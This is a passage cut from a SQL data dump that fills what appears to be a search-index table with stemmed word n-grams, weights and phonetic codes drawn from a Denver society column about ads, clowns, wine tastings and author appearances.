19',0,1,1.2,'M000',1,'en'),(20101,'may 19 wine','mai 19 wine',0,1,1.3667,'M000',1,'en'),(20102,'may 22','mai 22',0,1,1.2,'M000',1,'en'),(20103,'may 22 denver','mai 22 denver',0,1,1.4333,'M3516',1,'en'),(20104,'me','me',1,0,0.0167,'M000',6,'en'),(20105,'me pushed','me pushed',0,1,1.3,'M123',1,'en'),(20106,'me pushed with','me pushed with',0,1,1.4667,'M123',1,'en'),(20107,'mean','mean',0,0,0.2667,'M000',3,'en'),(20108,'mean time','mean time',0,1,1.3,'M350',1,'en'),(20109,'mean time goose','mean time goose',0,1,1.5,'M352',1,'en'),(20110,'meat','meat',0,0,0.2667,'M300',1,'en'),(20111,'meat is','meat is',0,1,1.2333,'M320',1,'en'),(20112,'meat is gross','meat is gross',0,1,1.4333,'M3262',1,'en'),(20113,'meat market','meat market',0,1,1.3667,'M35623',1,'en'),(20114,'meat market in','meat market in',0,1,1.4667,'M356235',1,'en'),(20115,'medals','medal',0,0,0.4,'M342',1,'en'),(20116,'medals a','medal a',0,1,1.2667,'M342',1,'en'),(20117,'medals a bronze','medal a bronze',0,1,1.5,'M3421652',1,'en'),(20118,'mezcal','mezcal',0,0,0.4,'M240',1,'en'),(20119,'mezcal at','mezcal at',0,1,1.3,'M243',1,'en'),(20120,'mezcal at thursday\'s','mezcal at thursday',0,1,1.6667,'M2436232',1,'en'),(20121,'missed','miss',0,0,0.4,'M230',2,'en'),(20122,'missed the','miss the',0,1,1.3333,'M230',2,'en'),(20123,'missed the olympic','miss the olympic',0,1,1.6,'M234512',1,'en'),(20124,'model','model',0,0,0.3333,'M340',3,'en'),(20125,'model feeling','model feeling',0,1,1.4333,'M341452',1,'en'),(20126,'model feeling that','model feeling that',0,1,1.6,'M3414523',1,'en'),(20127,'model his','model his',0,1,1.3,'M342',1,'en'),(20128,'model his olympic','model his olympic',0,1,1.5667,'M3424512',1,'en'),(20129,'molly','molli',0,0,0.3333,'M400',1,'en'),(20130,'molly kleeman','molli kleeman',0,1,1.4333,'M4245',1,'en'),(20131,'molly kleeman is','molli kleeman is',0,1,1.5333,'M42452',1,'en'),(20132,'monday','mondai',0,0,0.4,'M300',1,'en'),(20133,'monday night','mondai night',0,1,1.4,'M3523',1,'en'),(20134,'monday night served','mondai night served',0,1,1.6333,'M35232613',1,'en'),(20135,'month','month',0,0,0.3333,'M300',3,'en'),(20136,'month in','month in',0,1,1.2667,'M350',1,'en'),(20137,'month in many','month in many',0,1,1.4333,'M350',1,'en'),(20138,'more and','more and',0,1,1.2667,'M653',2,'en'),(20139,'more and stay','more and stay',0,1,1.4333,'M65323',1,'en'),(20140,'mouth','mouth',0,0,0.3333,'M300',1,'en'),(20141,'mouth watering','mouth watering',0,1,1.4667,'M3652',1,'en'),(20142,'mouth watering ralph','mouth watering ralph',0,1,1.6667,'M3652641',1,'en'),(20143,'music series','music series',0,1,1.4,'M262',1,'en'),(20144,'music series starts','music series starts',0,1,1.6333,'M2623632',1,'en'),(20145,'must','must',1,0,0.0333,'M230',4,'en'),(20146,'must have','must have',0,1,1.3,'M231',2,'en'),(20147,'must have a','must have a',0,1,1.3667,'M231',1,'en'),(20148,'my line','my line',0,1,1.2333,'M450',1,'en'),(20149,'my line actor','my line actor',0,1,1.4333,'M45236',1,'en'),(20150,'naked','nake',0,0,0.3333,'N230',1,'en'),(20151,'naked dinner','nake dinner',0,1,1.4,'N2356',1,'en'),(20152,'naked dinner city','nake dinner city',0,1,1.5667,'N235623',1,'en'),(20153,'naked no','nake no',0,1,1.2667,'N235',1,'en'),(20154,'naked no trademarks','nake no trademarks',0,1,1.6333,'N235363562',1,'en'),(20155,'named','name',0,0,0.3333,'N300',1,'en'),(20156,'named peta\'s','name peta',0,1,1.4,'N3132',1,'en'),(20157,'named peta\'s cutest','name peta cutest',0,1,1.6333,'N3132323',1,'en'),(20158,'names','name',0,0,0.3333,'N200',3,'en'),(20159,'names stay','name stay',0,1,1.3333,'N230',1,'en'),(20160,'names stay tuned','name stay tuned',0,1,1.5333,'N2353',1,'en'),(20161,'needs her','need her',0,1,1.3,'N326',1,'en'),(20162,'needs her bow','need her bow',0,1,1.4333,'N3261',1,'en'),(20163,'new watercolors','new watercolors',0,1,1.5,'N362462',1,'en'),(20164,'new watercolors u','new watercolors u',0,1,1.5667,'N362462',1,'en'),(20165,'night','night',0,0,0.3333,'N230',4,'en'),(20166,'night served','night served',0,1,1.4,'N232613',1,'en'),(20167,'night served up','night served up',0,1,1.5,'N2326131',1,'en'),(20168,'night walk','night walk',0,1,1.3333,'N2342',1,'en'),(20169,'night walk on','night walk on',0,1,1.4333,'N23425',1,'en'),(20170,'no trademarks','no trademarks',0,1,1.4333,'N363562',1,'en'),(20171,'no trademarks so','no trademarks so',0,1,1.5333,'N363562',1,'en'),(20172,'noel','noel',0,0,0.2667,'N400',1,'en'),(20173,'noel and','noel and',0,1,1.2667,'N453',1,'en'),(20174,'noel and tammy','noel and tammy',0,1,1.4667,'N4535',1,'en'),(20175,'nominees','nomine',0,0,0.5333,'N200',1,'en'),(20176,'nominees and','nomine and',0,1,1.4,'N253',1,'en'),(20177,'nominees and 55','nomine and 55',0,1,1.5,'N253',1,'en'),(20178,'nose','nose',0,0,0.2667,'N200',1,'en'),(20179,'nose in','nose in',0,1,1.2333,'N250',1,'en'),(20180,'nose in denver','nose in denver',0,1,1.4667,'N253516',1,'en'),(20181,'not clean','not clean',0,1,1.3,'N3245',1,'en'),(20182,'not clean joy','not clean joy',0,1,1.4333,'N32452',1,'en'),(20183,'not sure','not sure',0,1,1.2667,'N326',2,'en'),(20184,'not sure yet','not sure yet',0,1,1.4,'N3263',1,'en'),(20185,'not to','not to',0,1,1.2,'N300',2,'en'),(20186,'not to i\'m','not to i',0,1,1.3333,'N350',1,'en'),(20187,'of a\'s','of a',0,1,1.2,'O120',1,'en'),(20188,'of a\'s pictorials','of a pictorials',0,1,1.5667,'O12123642',1,'en'),(20189,'of denver','of denver',0,1,1.3,'O13516',1,'en'),(20190,'of denver senior','of denver senior',0,1,1.5333,'O13516256',1,'en'),(20191,'of quite','of quite',0,1,1.2667,'O123',1,'en'),(20192,'of quite l','of quite l',0,1,1.3333,'O1234',1,'en'),(20193,'of someone','of someone',0,1,1.3333,'O125',1,'en'),(20194,'of someone and','of someone and',0,1,1.4667,'O1253',1,'en'),(20195,'of the barth','of the barth',0,1,1.4,'O13163',1,'en'),(20196,'of the lobby','of the lobby',0,1,1.4,'O1341',1,'en'),(20197,'of the recent','of the recent',0,1,1.4333,'O136253',1,'en'),(20198,'of the several','of the several',0,1,1.4667,'O132164',1,'en'),(20199,'of the tony','of the tony',0,1,1.3667,'O135',1,'en'),(20200,'of well','of well',0,1,1.2333,'O140',1,'en'),(20201,'of well known','of well known',0,1,1.4333,'O1425',1,'en'),(20202,'off sez','off sez',0,1,1.2333,'O120',1,'en'),(20203,'off sez who','off sez who',0,1,1.3667,'O120',1,'en'),(20204,'off the beaten','off the beaten',0,1,1.4667,'O13135',1,'en'),(20205,'olympic','olymp',0,0,0.4667,'O4512',1,'en'),(20206,'olympic games','olymp games',0,1,1.4333,'O451252',1,'en'),(20207,'olympic games cut','olymp games cut',0,1,1.5667,'O4512523',1,'en'),(20208,'olympic rasing','olymp rasing',0,1,1.4667,'O45126252',1,'en'),(20209,'olympic rasing and','olymp rasing and',0,1,1.6,'O4512625253',1,'en'),(20210,'on a naked','on a naked',0,1,1.3333,'O523',1,'en'),(20211,'on account','on account',0,1,1.3333,'O5253',1,'en'),(20212,'on account that','on account that',0,1,1.5,'O5253',1,'en'),(20213,'on and same','on and same',0,1,1.3667,'O5325',1,'en'),(20214,'on in','on in',0,1,1.1667,'O500',1,'en'),(20215,'on in the','on in the',0,1,1.3,'O530',1,'en'),(20216,'on it','on it',0,1,1.1667,'O530',1,'en'),(20217,'on it was','on it was',0,1,1.3,'O532',1,'en'),(20218,'on monday','on monday',0,1,1.3,'O530',1,'en'),(20219,'on monday night','on monday night',0,1,1.5,'O53523',1,'en'),(20220,'on role','on role',0,1,1.2333,'O564',1,'en'),(20221,'on role before','on role before',0,1,1.4667,'O56416',1,'en'),(20222,'on stage','on stage',0,1,1.2667,'O5232',1,'en'),(20223,'on stage twice','on stage twice',0,1,1.4667,'O523232',1,'en'),(20224,'on the make','on the make',0,1,1.3667,'O5352',1,'en'),(20225,'once as','onc as',0,1,1.2333,'O520',1,'en'),(20226,'once as a','onc as a',0,1,1.3,'O520',1,'en'),(20227,'one must','on must',0,1,1.2667,'O523',1,'en'),(20228,'one must have','on must have',0,1,1.4333,'O5231',1,'en'),(20229,'one night','on night',0,1,1.3,'O523',1,'en'),(20230,'one night walk','on night walk',0,1,1.4667,'O52342',1,'en'),(20231,'one of the','on of the',0,1,1.3333,'O513',2,'en'),(20232,'options','option',0,0,0.4667,'O1352',2,'en'),(20233,'options people','option people',0,1,1.4667,'O135214',1,'en'),(20234,'options people wandered','option people wandered',0,1,1.7667,'O1352145363',1,'en'),(20235,'or the puppy\'s','or the puppy',0,1,1.4667,'O6312',1,'en'),(20236,'other denver','other denver',0,1,1.4,'O363516',1,'en'),(20237,'other denver bold','other denver bold',0,1,1.5667,'O363516143',1,'en'),(20238,'other elite','other elite',0,1,1.3667,'O3643',1,'en'),(20239,'other elite jocks','other elite jocks',0,1,1.5667,'O36432',1,'en'),(20240,'out for','out for',0,1,1.2333,'O316',1,'en'),(20241,'out for life','out for life',0,1,1.4,'O31641',1,'en'),(20242,'out of','out of',0,1,1.2,'O310',4,'en'),(20243,'out of the','out of the',0,1,1.3333,'O313',3,'en'),(20244,'outlet dinner','outlet dinner',0,1,1.4333,'O34356',1,'en'),(20245,'outlet dinner where','outlet dinner where',0,1,1.6333,'O34356',1,'en'),(20246,'outline','outlin',0,0,0.4667,'O345',1,'en'),(20247,'outline the','outlin the',0,1,1.3667,'O3453',1,'en'),(20248,'outline the clown','outlin the clown',0,1,1.5667,'O3453245',1,'en'),(20249,'output','output',0,0,0.4,'O313',1,'en'),(20250,'output of','output of',0,1,1.3,'O3131',1,'en'),(20251,'output of the','output of the',0,1,1.4333,'O31313',1,'en'),(20252,'over the railbenders','over the railbenders',0,1,1.6667,'O1636415362',1,'en'),(20253,'over the world','over the world',0,1,1.4667,'O163643',1,'en'),(20254,'pages 8','page 8',0,1,1.2333,'P200',1,'en'),(20255,'pair','pair',0,0,0.2667,'P600',1,'en'),(20256,'pair up','pair up',0,1,1.2333,'P610',1,'en'),(20257,'pair up four','pair up four',0,1,1.4,'P616',1,'en'),(20258,'pam','pam',0,0,0.2,'P500',1,'en'),(20259,'pam clifton','pam clifton',0,1,1.3667,'P524135',1,'en'),(20260,'pam clifton had','pam clifton had',0,1,1.5,'P5241353',1,'en'),(20261,'paradeability','parad',0,0,0.8667,'P63143',1,'en'),(20262,'paradeability and','parad and',0,1,1.5667,'P6314353',1,'en'),(20263,'paradeability and the','parad and the',0,1,1.7,'P6314353',1,'en'),(20264,'part of denver','part of denver',0,1,1.4667,'P6313516',1,'en'),(20265,'past','past',0,0,0.2667,'P230',2,'en'),(20266,'past weekend','past weekend',0,1,1.4,'P23253',1,'en'),(20267,'past weekend but','past weekend but',0,1,1.5333,'P2325313',1,'en'),(20268,'people','peopl',0,0,0.4,'P400',11,'en'),(20269,'people wandered','peopl wandered',0,1,1.5,'P45363',1,'en'),(20270,'people wandered in','peopl wandered in',0,1,1.6,'P453635',1,'en'),(20271,'perhaps','perhap',0,0,0.4667,'P612',5,'en'),(20272,'perhaps also','perhap also',0,1,1.4,'P61242',1,'en'),(20273,'perhaps also known','perhap also known',0,1,1.6,'P612425',1,'en'),(20274,'peta\'s','peta',0,0,0.4,'P320',1,'en'),(20275,'peta\'s cutest','peta cutest',0,1,1.4333,'P32323',1,'en'),(20276,'peta\'s cutest all-vegetable','peta cutest all-vegetable',0,1,1.9,'P32323412314',1,'en'),(20277,'pictorials','pictori',0,0,0.6667,'P23642',1,'en'),(20278,'pictorials at','pictori at',0,1,1.4333,'P236423',1,'en'),(20279,'pictorials at her','pictori at her',0,1,1.5667,'P2364236',1,'en'),(20280,'pierre','pierr',0,0,0.4,'P600',1,'en'),(20281,'pierre wolfe','pierr wolfe',0,1,1.4,'P641',1,'en'),(20282,'pierre wolfe day','pierr wolfe day',0,1,1.5333,'P6413',1,'en'),(20283,'place to','place to',0,1,1.2667,'P423',1,'en'),(20284,'place to leave','place to leave',0,1,1.4667,'P42341',1,'en'),(20285,'play','plai',0,0,0.2667,'P400',2,'en'),(20286,'play went','plai went',0,1,1.3,'P453',1,'en'),(20287,'play went on','plai went on',0,1,1.4,'P4535',1,'en'),(20288,'poor','poor',0,0,0.2667,'P600',1,'en'),(20289,'poor and','poor and',0,1,1.2667,'P653',1,'en'),(20290,'poor and it\'s','poor and it',0,1,1.4333,'P6532',1,'en'),(20291,'print ads','print ads',0,1,1.3,'P6532',1,'en'),(20292,'print ads by','print ads by',0,1,1.4,'P65321',1,'en'),(20293,'produce the','produc the',0,1,1.3667,'P6323',1,'en'),(20294,'produce the but','produc the but',0,1,1.5,'P632313',1,'en'),(20295,'puppy\'s','puppi',0,0,0.4667,'P200',1,'en'),(20296,'puppy\'s gallery','puppi gallery',0,1,1.5,'P246',1,'en'),(20297,'puppy\'s gallery at','puppi gallery at',0,1,1.6,'P2463',1,'en'),(20298,'pushed','push',0,0,0.4,'P230',1,'en'),(20299,'pushed with','push with',0,1,1.3667,'P230',1,'en'),(20300,'pushed with a','push with a',0,1,1.4333,'P230',1,'en'),(20301,'puts','put',0,0,0.2667,'P320',1,'en'),(20302,'puts her','put her',0,1,1.2667,'P326',1,'en'),(20303,'puts her in','put her in',0,1,1.3667,'P3265',1,'en'),(20304,'quite','quit',0,0,0.3333,'Q300',1,'en'),(20305,'quite l','quit l',0,1,1.2333,'Q340',1,'en'),(20306,'quite l again','quit l again',0,1,1.4333,'Q3425',1,'en'),(20307,'railbenders','railbend',0,0,0.7333,'R415362',1,'en'),(20308,'railbenders and','railbend and',0,1,1.5,'R41536253',1,'en'),(20309,'railbenders and ends','railbend and ends',0,1,1.6667,'R41536253532',1,'en'),(20310,'ralph lauren uk','ralph lauren uk',0,1,1.5,'R414652',3,'en'),(20311,'ralph lauren who','ralph lauren who',0,1,1.5333,'R41465',1,'en'),(20312,'ralph lauren\'s','ralph lauren',0,1,1.4667,'R414652',1,'en'),(20313,'ralph lauren\'s latest','ralph lauren latest',0,1,1.7,'R4146524323',1,'en'),(20314,'rasing','rase',0,0,0.4,'R252',1,'en'),(20315,'rasing and','rase and',0,1,1.3333,'R25253',1,'en'),(20316,'rasing and lowering','rase and lowering',0,1,1.6333,'R252534652',1,'en'),(20317,'realtor','realtor',0,0,0.4667,'R436',1,'en'),(20318,'realtor judy','realtor judy',0,1,1.4,'R43623',1,'en'),(20319,'realtor judy fahrenkrog','realtor judy fahrenkrog',0,1,1.7667,'R43623165262',1,'en'),(20320,'receivable','receiv',0,0,0.6667,'R214',1,'en'),(20321,'receivable its','receiv its',0,1,1.4667,'R21432',1,'en'),(20322,'receivable its may','receiv its may',0,1,1.6,'R214325',1,'en'),(20323,'recent','recent',0,0,0.4,'R253',1,'en'),(20324,'recent l','recent l',0,1,1.2667,'R2534',1,'en'),(20325,'recent l baltimore','recent l baltimore',0,1,1.6,'R253414356',1,'en'),(20326,'recently','recent',0,0,0.5333,'R2534',1,'en'),(20327,'recently back','recent back',0,1,1.4333,'R253412',1,'en'),(20328,'recently back from','recent back from',0,1,1.6,'R253412165',1,'en'),(20329,'recently on','recent on',0,1,1.3667,'R25345',1,'en'),(20330,'recently on account','recent on account',0,1,1.6333,'R25345253',1,'en'),(20331,'red','red',0,0,0.2,'R300',5,'en'),(20332,'red nose','red nose',0,1,1.2667,'R352',1,'en'),(20333,'red nose in','red nose in',0,1,1.3667,'R3525',1,'en'),(20334,'remember','rememb',0,0,0.5333,'R516',1,'en'),(20335,'remember not','rememb not',0,1,1.4,'R51653',1,'en'),(20336,'remember not to','rememb not to',0,1,1.5,'R51653',1,'en'),(20337,'residents','resid',0,0,0.6,'R23532',1,'en'),(20338,'residents was','resid was',0,1,1.4333,'R23532',1,'en'),(20339,'residents was displayed','resid was displayed',0,1,1.7667,'R2353232143',1,'en'),(20340,'return','return',0,0,0.4,'R365',1,'en'),(20341,'return bridal','return bridal',0,1,1.4333,'R3651634',1,'en'),(20342,'return bridal tambien','return bridal tambien',0,1,1.7,'R36516343515',1,'en'),(20343,'return to','return to',0,1,1.3,'R3653',1,'en'),(20344,'return to frederick','return to frederick',0,1,1.6333,'R365316362',1,'en'),(20345,'revival','reviv',0,0,0.4667,'R140',1,'en'),(20346,'revival of','reviv of',0,1,1.3333,'R141',1,'en'),(20347,'revival of quite','reviv of quite',0,1,1.5333,'R14123',1,'en'),(20348,'rioja','rioja',0,0,0.3333,'R200',1,'en'),(20349,'rioja is','rioja is',0,1,1.2667,'R200',1,'en'),(20350,'rioja is accounts','rioja is accounts',0,1,1.5667,'R2532',1,'en'),(20351,'role','role',0,0,0.2667,'R400',3,'en'),(20352,'role before','role before',0,1,1.3667,'R416',1,'en'),(20353,'role before i','role before i',0,1,1.4333,'R416',1,'en'),(20354,'rundown','rundown',0,0,0.4667,'R535',1,'en'),(20355,'rundown hotel','rundown hotel',0,1,1.4333,'R53534',1,'en'),(20356,'rundown hotel and','rundown hotel and',0,1,1.5667,'R5353453',1,'en'),(20357,'rushdie','rushdi',0,0,0.4667,'R230',1,'en'),(20358,'rushdie skedded','rushdi skedded',0,1,1.5,'R2323',1,'en'),(20359,'rushdie skedded for','rushdi skedded for',0,1,1.6333,'R232316',1,'en'),(20360,'s of','s of',0,1,1.1333,'S100',1,'en'),(20361,'s of a\'s','s of a',0,1,1.2667,'S120',1,'en'),(20362,'s wilcox','s wilcox',0,1,1.2667,'S420',1,'en'),(20363,'salman','salman',0,0,0.4,'S450',1,'en'),(20364,'salman rushdie','salman rushdie',0,1,1.4667,'S45623',1,'en'),(20365,'salman rushdie skedded','salman rushdie skedded',0,1,1.7333,'S4562323',1,'en'),(20366,'same goes','same goes',0,1,1.3,'S520',1,'en'),(20367,'same goes with','same goes with',0,1,1.4667,'S523',1,'en'),(20368,'sardella','sardella',0,0,0.5333,'S634',1,'en'),(20369,'sardella and','sardella and',0,1,1.4,'S63453',1,'en'),(20370,'sardella and ann','sardella and ann',0,1,1.5333,'S634535',1,'en'),(20371,'says we\'re','sai we',0,1,1.3333,'S600',1,'en'),(20372,'says we\'re not','sai we not',0,1,1.4667,'S653',1,'en'),(20373,'senior','senior',0,0,0.4,'S560',1,'en'),(20374,'senior options','senior options',0,1,1.4667,'S561352',1,'en'),(20375,'senior options people','senior options people',0,1,1.7,'S56135214',1,'en'),(20376,'series','seri',0,0,0.4,'S620',2,'en'),(20377,'series starts','seri starts',0,1,1.4333,'S623632',1,'en'),(20378,'series starts june','seri starts june',0,1,1.6,'S6236325',1,'en'),(20379,'served up','serv up',0,1,1.3,'S6131',1,'en'),(20380,'served up a','serv up a',0,1,1.3667,'S6131',1,'en'),(20381,'several denverites','sever denverites',0,1,1.6,'S164351632',1,'en'),(20382,'several denverites who','sever denverites who',0,1,1.7333,'S164351632',1,'en'),(20383,'sez','sez',0,0,0.2,'S000',1,'en'),(20384,'sez who','sez who',0,1,1.2333,'S000',1,'en'),(20385,'sez who have','sez who have',0,1,1.4,'S100',1,'en'),(20386,'she','she',1,0,0.025,'S000',6,'en'),(20387,'she achieved','she achieved',0,1,1.4,'S130',1,'en'),(20388,'she achieved lauren\'s','she achieved lauren',0,1,1.7,'S134652',1,'en'),(20389,'she missed','she missed',0,1,1.3333,'S523',1,'en'),(20390,'she missed the','she missed the',0,1,1.4667,'S523',1,'en'),(20391,'she\'s','she',0,0,0.3333,'S000',1,'en'),(20392,'she\'s been','she been',0,1,1.3333,'S150',1,'en'),(20393,'she\'s been slapping','she been slapping',0,1,1.6333,'S1524152',1,'en'),(20394,'she\'s recently','she recently',0,1,1.4667,'S62534',1,'en'),(20395,'she\'s recently back','she recently back',0,1,1.6333,'S6253412',1,'en'),(20396,'she\'s won','she won',0,1,1.3,'S500',1,'en'),(20397,'she\'s won clown','she won clown',0,1,1.5,'S5245',1,'en'),(20398,'show commercial','show commercial',0,1,1.5,'S5624',1,'en'),(20399,'show commercial remember','show commercial remember',0,1,1.8,'S56246516',1,'en'),(20400,'silver','silver',0,0,0.4,'S416',2,'en'),(20401,'silver in','silver in',0,1,1.3,'S4165',1,'en'),(20402,'silver in paradeability','silver in paradeability',0,1,1.7667,'S4165163143',1,'en'),(20403,'since','sinc',0,0,0.3333,'S520',5,'en'),(20404,'since 1996','sinc 1996',0,1,1.3333,'S520',1,'en'),(20405,'since 1996 and','sinc 1996 and',0,1,1.4667,'S5253',1,'en'),(20406,'sister','sister',0,0,0.4,'S360',1,'en'),(20407,'sister cities','sister cities',0,1,1.4333,'S36232',1,'en'),(20408,'sister cities essential','sister cities essential',0,1,1.7667,'S36232534',1,'en'),(20409,'skedded','sked',0,0,0.4667,'S300',1,'en'),(20410,'skedded for','sked for',0,1,1.3667,'S316',1,'en'),(20411,'skedded for the','sked for the',0,1,1.5,'S3163',1,'en'),(20412,'skiddles','skiddl',0,0,0.5333,'S342',1,'en'),(20413,'skiddles the','skiddl the',0,1,1.4,'S3423',1,'en'),(20414,'skiddles the clown','skiddl the clown',0,1,1.6,'S3423245',1,'en'),(20415,'slapping','slap',0,0,0.5333,'S4152',1,'en'),(20416,'slapping on','slap on',0,1,1.3667,'S41525',1,'en'),(20417,'slapping on the','slap on the',0,1,1.5,'S415253',1,'en'),(20418,'so the','so the',0,1,1.2,'S300',1,'en'),(20419,'so the tasting','so the tasting',0,1,1.4667,'S32352',1,'en'),(20420,'solera','solera',0,0,0.4,'S460',1,'en'),(20421,'solera on','solera on',0,1,1.3,'S465',1,'en'),(20422,'solera on monday','solera on monday',0,1,1.5333,'S4653',1,'en'),(20423,'some print','some print',0,1,1.3333,'S51653',1,'en'),(20424,'some print ads','some print ads',0,1,1.4667,'S516532',1,'en'),(20425,'someone','someon',0,0,0.4667,'S500',3,'en'),(20426,'someone and','someon and',0,1,1.3667,'S530',1,'en'),(20427,'someone and i','someon and i',0,1,1.4333,'S530',1,'en'),(20428,'sorensen','sorensen',0,0,0.5333,'S6525',1,'en'),(20429,'sorensen at','sorensen at',0,1,1.3667,'S65253',1,'en'),(20430,'sorensen at solera','sorensen at solera',0,1,1.6,'S65253246',1,'en'),(20431,'st','st',0,0,0.1333,'S300',2,'en'),(20432,'st noel','st noel',0,1,1.2333,'S354',1,'en'),(20433,'st noel and','st noel and',0,1,1.3667,'S35453',1,'en'),(20434,'stage','stage',0,0,0.3333,'S320',1,'en'),(20435,'stage twice','stage twice',0,1,1.3667,'S3232',1,'en'),(20436,'stage twice in','stage twice in',0,1,1.4667,'S32325',1,'en'),(20437,'star','star',0,0,0.2667,'S360',3,'en'),(20438,'star in','star in',0,1,1.2333,'S365',1,'en'),(20439,'star in some','star in some',0,1,1.4,'S36525',1,'en'),(20440,'start appearing','start appearing',0,1,1.5,'S3631652',1,'en'),(20441,'start appearing this','start appearing this',0,1,1.6667,'S363165232',1,'en'),(20442,'starts','start',0,0,0.4,'S3632',2,'en'),(20443,'starts june','start june',0,1,1.3667,'S36325',1,'en'),(20444,'starts june 11','start june 11',0,1,1.4667,'S36325',1,'en'),(20445,'stay','stai',0,0,0.2667,'S300',2,'en'),(20446,'stay at','stai at',0,1,1.2333,'S300',1,'en'),(20447,'stay at the','stai at the',0,1,1.3667,'S300',1,'en'),(20448,'stay tuned','stai tuned',0,1,1.3333,'S353',1,'en'),(20449,'stay tuned for','stai tuned for',0,1,1.4667,'S35316',1,'en'),(20450,'stop working','stop working',0,1,1.4,'S316252',1,'en'),(20451,'stop working fledermaus','stop working fledermaus',0,1,1.7667,'S316252143652',1,'en'),(20452,'stroll','stroll',0,0,0.4,'S364',1,'en'),(20453,'stroll on','stroll on',0,1,1.3,'S3645',1,'en'),(20454,'stroll on and','stroll on and',0,1,1.4333,'S36453',1,'en'),(20455,'student','student',0,0,0.4667,'S353',1,'en'),(20456,'student leonard','student leonard',0,1,1.5,'S3534563',1,'en'),(20457,'student leonard sun','student leonard sun',0,1,1.6333,'S353456325',1,'en'),(20458,'style tip','style tip',0,1,1.3,'S3431',1,'en'),(20459,'style tip off','style tip off',0,1,1.4333,'S3431',1,'en'),(20460,'summer','summer',0,0,0.4,'S560',2,'en'),(20461,'summer music','summer music',0,1,1.4,'S5652',1,'en'),(20462,'summer music series','summer music series',0,1,1.6333,'S565262',1,'en'),(20463,'sun','sun',0,0,0.2,'S500',2,'en'),(20464,'sun defined','sun defined',0,1,1.3667,'S53153',1,'en'),(20465,'sun defined meat','sun defined meat',0,1,1.5333,'S5315353',1,'en'),(20466,'sun is','sun is',0,1,1.2,'S520',1,'en'),(20467,'sun is the','sun is the',0,1,1.3333,'S523',1,'en'),(20468,'sun was','sun was',0,1,1.2333,'S520',1,'en'),(20469,'sun was just','sun was just',0,1,1.4,'S523',1,'en'),(20470,'supernumerary','supernumerari',0,0,0.8667,'S1656',1,'en'),(20471,'supernumerary in','supernumerari in',0,1,1.5333,'S16565',1,'en'),(20472,'supernumerary in ie','supernumerari in ie',0,1,1.6333,'S16565',1,'en'),(20473,'sure','sure',0,0,0.2667,'S600',5,'en'),(20474,'sure yet','sure yet',0,1,1.2667,'S630',1,'en'),(20475,'sure yet on','sure yet on',0,1,1.3667,'S635',1,'en'),(20476,'tambien','tambien',0,0,0.4667,'T515',1,'en'),(20477,'tambien with','tambien with',0,1,1.4,'T5153',1,'en'),(20478,'tambien with holly','tambien with holly',0,1,1.6,'T51534',1,'en'),(20479,'tammy','tammi',0,0,0.3333,'T500',1,'en'),(20480,'tammy cunningham','tammi cunningham',0,1,1.5333,'T52525',1,'en'),(20481,'tammy cunningham will','tammi cunningham will',0,1,1.7,'T525254',1,'en'),(20482,'tasting','tast',0,0,0.4667,'T2352',1,'en'),(20483,'tasting will','tast will',0,1,1.4,'T23524',1,'en'),(20484,'tasting will be','tast will be',0,1,1.5,'T235241',1,'en'),(20485,'tazo','tazo',0,0,0.2667,'T200',1,'en'),(20486,'tazo tea','tazo tea',0,1,1.2667,'T230',1,'en'),(20487,'tazo tea infused','tazo tea infused',0,1,1.5333,'T235123',1,'en'),(20488,'tea','tea',0,0,0.2,'T000',2,'en'),(20489,'tea infused','tea infused',0,1,1.3667,'T5123',1,'en'),(20490,'tea infused mouth','tea infused mouth',0,1,1.5667,'T512353',1,'en'),(20491,'that puts','that puts',0,1,1.3,'T132',1,'en'),(20492,'that puts her','that puts her',0,1,1.4333,'T1326',1,'en'),(20493,'that we can','that we can',0,1,1.3667,'T250',1,'en'),(20494,'that\'s how','that how',0,1,1.3333,'T200',1,'en'),(20495,'that\'s how rioja','that how rioja',0,1,1.5333,'T262',1,'en'),(20496,'that\'s part','that part',0,1,1.3667,'T2163',1,'en'),(20497,'that\'s part of','that part of',0,1,1.4667,'T21631',1,'en'),(20498,'the ads','the ads',0,1,1.2333,'T200',1,'en'),(20499,'the ads will','the ads will',0,1,1.4,'T240',1,'en'),(20500,'the appearance','the appearance',0,1,1.4667,'T1652',1,'en'),(20501,'the appearance of','the appearance of',0,1,1.5667,'T16521',1,'en'),(20502,'the aspen','the aspen',0,1,1.3,'T215',1,'en'),(20503,'the aspen lit','the aspen lit',0,1,1.4333,'T21543',1,'en'),(20504,'the barth','the barth',0,1,1.3,'T163',1,'en'),(20505,'the barth hotel','the barth hotel',0,1,1.5,'T1634',1,'en'),(20506,'the beaten','the beaten',0,1,1.3333,'T135',1,'en'),(20507,'the beaten track','the beaten track',0,1,1.5333,'T135362',1,'en'),(20508,'the bottles','the bottles',0,1,1.3667,'T1342',1,'en'),(20509,'the bottles to','the bottles to',0,1,1.4667,'T13423',1,'en'),(20510,'the but','the but',0,1,1.2333,'T130',1,'en'),(20511,'the but he\'ll','the but he',0,1,1.4333,'T134',1,'en'),(20512,'the clown','the clown',0,1,1.3,'T245',1,'en'),(20513,'the clown molly','the clown molly',0,1,1.5,'T2454',1,'en'),(20514,'the clown she\'s','the clown she',0,1,1.5,'T2452',1,'en'),(20515,'the coming','the coming',0,1,1.3333,'T252',1,'en'),(20516,'the coming revival','the coming revival',0,1,1.6,'T252614',1,'en'),(20517,'the cover','the cover',0,1,1.3,'T216',1,'en'),(20518,'the cover of','the cover of',0,1,1.4,'T2161',1,'en'),(20519,'the denver','the denver',0,1,1.3333,'T516',1,'en'),(20520,'the denver kid','the denver kid',0,1,1.4667,'T51623',1,'en'),(20521,'the gold','the gold',0,1,1.2667,'T243',1,'en'),(20522,'the gold in','the gold in',0,1,1.3667,'T2435',1,'en'),(20523,'the greatest','the greatest',0,1,1.4,'T26323',1,'en'),(20524,'the greatest vegan','the greatest vegan',0,1,1.6,'T26323125',1,'en'),(20525,'the hot','the hot',0,1,1.2333,'T000',1,'en'),(20526,'the line','the line',0,1,1.2667,'T450',1,'en'),(20527,'the line announcing','the line announcing',0,1,1.6333,'T45252',1,'en'),(20528,'the lobby','the lobby',0,1,1.3,'T410',1,'en'),(20529,'the lobby as','the lobby as',0,1,1.4,'T412',1,'en'),(20530,'the lobby of','the lobby of',0,1,1.4,'T410',1,'en'),(20531,'the lodo','the lodo',0,1,1.2667,'T430',1,'en'),(20532,'the lodo family','the lodo family',0,1,1.5,'T43154',1,'en'),(20533,'the make','the make',0,1,1.2667,'T520',1,'en'),(20534,'the make ralph','the make ralph',0,1,1.4667,'T52641',1,'en'),(20535,'the may','the may',0,1,1.2333,'T500',2,'en'),(20536,'the may 22','the may 22',0,1,1.3333,'T500',1,'en'),(20537,'the mean','the 